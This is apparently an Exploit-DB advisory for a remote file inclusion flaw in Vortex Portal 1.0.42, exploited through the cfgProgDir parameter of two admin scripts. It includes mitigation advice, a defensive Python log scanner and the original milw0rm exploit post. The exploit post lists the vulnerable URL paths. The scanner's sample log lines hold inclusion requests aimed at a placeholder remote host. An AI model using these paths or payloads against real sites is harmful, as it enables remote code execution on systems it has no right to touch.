Vendor: Vortex Portal
By: ShAy6oOoN
CVSS: 7.5 (HIGH)
Vuln Type: RFI
CWE: 98
Product Name: Vortex Portal
Affected Version From: Vortex Portal 1.0.42
Affected Version To: Vortex Portal 1.0.42
Patch Exists: NO
2007

Vortex Portal 1.0.42 RFI

Vortex Portal 1.0.42 is vulnerable to Remote File Inclusion (RFI) when PHP's register_globals setting is ON. The affected scripts are admincp/auth/secure.php and admincp/auth/checklogin.php, through the cfgProgDir request parameter. An attacker can exploit the vulnerability to include and execute arbitrary remote files.

Mitigation:

To mitigate the vulnerability, turn off register_globals in the PHP configuration, or upgrade to a newer version of the script that does not have this vulnerability.
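For hosts that still run this version, the following added example (not part of the original advisory or of Vortex Portal) scans web access logs for requests that supply cfgProgDir to the two scripts named in the advisory. It assumes the Apache/nginx "combined" log layout; the sample lines, addresses and the example.invalid host are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoints and parameter taken from the advisory text.
ENDPOINTS = ("/admincp/auth/secure.php", "/admincp/auth/checklogin.php")
PARAM = "cfgprogdir"
# Value that leaves the local tree: scheme (http:, ftp:, php:, data:), //host or UNC path.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
# Assumption: Apache/nginx "combined" access-log layout.
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(rounds):
        value, prev = unquote(value), value
        if value == prev:
            break
    return value

def classify(line):
    """Return (client, status, severity, value) for a hit, or None."""
    m = LOG.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if not decode(url.path).lower().endswith(ENDPOINTS):
        return None
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        if decode(key).lower() == PARAM:
            value = decode(raw)
            # Any client-supplied cfgProgDir is unexpected; a remote value is worse.
            severity = "high" if REMOTE.match(value) else "review"
            return client, int(status), severity, value
    return None

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE = [
    '198.51.100.4 - - [04/Nov/2007:10:00:00 +0000] "GET /portal/admincp/auth/secure.php HTTP/1.1" 200 900 "-" "-"',
    '203.0.113.7 - - [04/Nov/2007:10:12:01 +0000] "GET /portal/admincp/auth/secure.php?cfgProgDir=http://example.invalid/a HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [04/Nov/2007:10:12:05 +0000] "GET /portal/admincp/auth/checklogin.php?cfgProgDir=hTTp%3A%2F%2Fexample.invalid%2Fa HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.9 - - [04/Nov/2007:10:12:09 +0000] "GET /portal/admincp/auth/checklogin.php?cfgProgDir=includes/ HTTP/1.1" 200 300 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A "high" hit with a 200 status is the case to triage first; "review" hits carry a local-looking value but still show a client setting a variable the application should define itself.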

Exploit-DB raw data:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ Vortex Portal 1.0.42 RFI ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~

----------
Author   : ShAy6oOoN
----------
Group    : PitBull Crew
----------
Script   : Vortex Portal 1.0.42
----------
Download : http://www.igamingcms.com/legacy-software/VortexPortal1.0.42.zip
----------
Vuln Type: RFI
----------


Register_globals: ON
-----------------

/path/admincp/auth/secure.php?cfgProgDir=

/path/admincp/auth/checklogin.php?cfgProgDir=


Greetings:
----------

PitBull Crew : The_PitBull - iNs - MaxDeMon - SancheZ - r0x00k - c0ol


Thanks To:
----------

str0ke - BiNgZa

# milw0rm.com [2007-11-04]